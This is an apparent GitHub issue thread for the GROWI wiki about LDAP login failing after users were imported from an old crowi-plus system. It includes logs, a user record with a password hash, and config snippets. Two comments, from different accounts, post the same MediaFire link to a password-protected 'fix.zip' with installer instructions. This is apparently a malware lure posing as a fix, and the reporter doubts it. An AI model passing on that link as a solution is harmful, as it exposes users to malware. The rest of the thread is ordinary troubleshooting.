### ISSUE TITLE
[7.0.17]LDAP認証で失敗　『Cannot read properties of null (reading 'id')』

### ISSUE THREAD

**Issue by dev-hayash** [weseek/growi#9041]
Environment
------------

### Host

| item     | version |
| ---      | --- |
|OS        |ubuntu24.04|
|GROWI     |7.0.17|
|node.js   |20.17.0|
|npm       |10.8.2|
|yarn       |1.22.22|
|Using Docker | yes |
|Using growi-docker-compose | yes |
[growi-docker-compose]: https://github.com/weseek/growi-docker-compose

### Client

| item     | version |
| ---      | --- |
|OS        |windows11|
|browser |  edge バージョン 128.0.2739.42 (公式ビルド) (64 ビット) |

How to reproduce? (再現手順)
---------------------------

1. growiをdocker composeでセットアップし、LDAP認証を設定・有効化する。
1. crowi-plus 2.1.0 の環境からusersをエクスポートしてgrowiにインポートする。
growiにインポートしてログインを試みたユーザーのdocument（growiにadministratorでログインした際に管理者権限を設定している）

```json
{
  "_id": {
    "$oid": "59c0eb631deb9f0514babb32"
  },
  "email": "aaa.bbb@example.co.jp",
  "username": "first.last",
  "name": "氏名",
  "admin": true,
  "createdAt": {
    "$date": "2017-09-19T10:03:15.695Z"
  },
  "status": 2,
  "lang": "ja",
  "isGravatarEnabled": false,
  "__v": 0,
  "lastLoginAt": {
    "$date": "2017-09-26T23:52:43.946Z"
  },
  "image": "/uploads/user/59c0eb631deb9f0514babb32.jpg",
  "imageUrlCached": "/uploads/user/59c0eb631deb9f0514babb32.jpg",
  "updatedAt": {
    "$date": "2024-08-26T02:10:57.034Z"
  },
  "isEmailPublished": true,
  "isInvitationEmailSended": false,
  "isQuestionnaireEnabled": true,
  "readOnly": false,
  "password": "fc8d78ef97780f6881a817a1c01a97effef67cb0da6b68d3f06a897c457a450b"
}    
```
1. growiでは LDAP認証のみとしたかったので、環境変数を変更しローカル認証を無効化してLDAP認証だけ有効にする。
```yaml
LOCAL_STRATEGY_ENABLED=false
LOCAL_STRATEGY_USES_ONLY_ENV_VARS_FOR_SOME_OPTIONS=true    
```

What happens? (症状)
---------------------

- ログイン画面で`Cannot read properties of null (reading 'id')` が表示される
![image](https://github.com/user-attachments/assets/bce39a6e-6bc5-4f6e-9a25-1f44bd026d83)

server log
---------------------
```
app-1 | {"name":"growi:routes:login-passport","hostname":"04d0873c40c4","pid":12,"level":20,"msg":"--- authenticate with ldapauth strategy ---","time":"2024-08-26T04:20:13.782Z","v":0}
app-1 | {"name":"growi:routes:login-passport","hostname":"04d0873c40c4","pid":12,"level":20,"msg":"response {\n  dn:（省略） ,"time":"2024-08-26T04:20:13.782Z","v":0}
app-1 | {"name":"growi:routes:login-passport","hostname":"04d0873c40c4","pid":12,"level":20,"msg":"info undefined","time":"2024-08-26T04:20:13.782Z","v":0}
app-1 | {"name":"growi:routes:login-passport","hostname":"04d0873c40c4","pid":12,"level":20,"msg":"Cannot read properties of null (reading 'id')","time":"2024-08-26T04:20:13.790Z","v":0}
app-1 | {"name":"express","hostname":"04d0873c40c4","pid":12,"req_id":"35a6471b-de83-44d5-b11f-cfacb801465d","level":40,"msg":"::ffff:192.168.160.102 <-- POST /_api/v3/login HTTP/1.1 400 84 http://(hostname)/login Chrome 128.0 Windows 10.0.0 38.023378 ms","time":"2024-08-26T04:20:13.797Z","v":0}
```

What is the expected result? (期待される動作)
-------------------------------------------
- もし`users collection`にマイグレーションが必要な場合はご教示頂きたいです。

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dev-hayash** [comment]
これ、きっとダウンロードしちゃダメなやつですよね・・・

**Comment by dev-hayash** [comment]
本件の補足です。

１．全ての認証が失敗するのではなく、一部のユーザーの認証が失敗します。
失敗時の現象は、同じく「Cannot read properties of null (reading 'id')」がログと画面に出力されます。

２．管理者ユーザーでログインしてセキュリティ設定－認証機構設定－LDAPの画面から、認証に失敗するユーザーのアカウントでログインテストを行うと、全てテストは成功します。

３．LDAP認証に成功しているユーザーは、ログイン後に個人設定を見ると外部アカウントにldapが登録されている。
LDAP認証に失敗するユーザーがローカルアカウントでログインして、同じIDで同様に外部アカウントにldapを登録しようとすると、以下の内容がログに出力される。
```
app-1             | {"name":"express","hostname":"a6b9c0910a67","pid":14,"req_id":"f4e095b8-0d22-4bb5-87f8-c6b0c0d9ce14","level":30,"msg":"::ffff:192.168.160.122 <-- GET /_api/v3/personal-setting/external-accounts HTTP/1.1 304 - http://(server name)/me Chrome 130.0 Windows 10.0.0 11.678035 ms","time":"2024-11-08T06:42:48.293Z","v":0}
app-1             | {"name":"express","hostname":"a6b9c0910a67","pid":14,"req_id":"a5a10b35-9d27-470e-bced-dd9da3713cbe","level":30,"msg":"::ffff:192.168.160.122 <-- GET /_api/v3/in-app-notification/status HTTP/1.1 304 - http://(server name)/me Chrome 130.0 Windows 10.0.0 11.626003 ms","time":"2024-11-08T06:42:48.295Z","v":0}
app-1             | {"name":"growi:routes:apiv3:personal-setting","hostname":"a6b9c0910a67","pid":14,"level":50,"err":{"message":"ExternalAccount validation failed: providerType: Error, expected `providerType` to be unique. Value: `ldap`, accountId: Error, expected `accountId` to be unique. Value: `(local account name)`","name":"ValidationError","stack":"ValidationError: ExternalAccount validation failed: providerType: Error, expected `providerType` to be unique. Value: `ldap`, accountId: Error, expected `accountId` to be unique. Value: `(local account name)`\n    at Document.invalidate (/opt/growi/node_modules/mongoose/lib/document.js:3168:32)\n    at /opt/growi/node_modules/mongoose/lib/document.js:2956:17\n    at /opt/growi/node_modules/mongoose/lib/schematype.js:1349:9\n    at process.processTicksAndRejections (node:internal/process/task_queues:77:11)"},"msg":"ExternalAccount validation failed: providerType: Error, expected `providerType` to be unique. Value: `ldap`, accountId: Error, expected `accountId` to be unique. Value: `(local account name)`","time":"2024-11-08T06:42:48.347Z","v":0}
app-1             | {"name":"express","hostname":"a6b9c0910a67","pid":14,"req_id":"56aeac54-8111-4ab6-8184-db0880e79453","level":40,"msg":"::ffff:192.168.160.122 <-- PUT /_api/v3/personal-setting/associate-ldap HTTP/1.1 400 69 http://(server name)/me Chrome 130.0 Windows 10.0.0 11.146229 ms","time":"2024-11-08T06:42:48.349Z","v":0}
```

**Comment by dev-hayash** [comment]
返信ありがとうございます。

> デバッグレベルを上げてログを取る

yamlで特にDEBUG指定していないのでconfig.prod.jsが既に適用されているようです。
``` js
module.exports = {
  default: 'info',
  'growi:routes:login-passport': 'debug',
  'growi:service:PassportService': 'debug',
};
```

念のため、docker-compose.ymlのenvironmentに追記してみましたが、出力されるログの情報は増えていませんでした。

```
    environment:
      - DEBUG=growi:routes:login,growi:routes:login-passport,growi:service:PassportService
```

> データの送付

yuki＠weseek.co.jp　への送付でよろしいでしょうか。

上記で宜しければ、ログ（省略無し）とMongoDBを送付いたします。

**Comment by yuki-takei** [comment]
なにはともあれ解決してよかったです。

今回の事象は古いシステムからのエクスポート・インポートを経た環境での発現ということで再現性があるかどうか不明ですので、Issue としてはクローズさせていただきます。共有ありがとうございました。
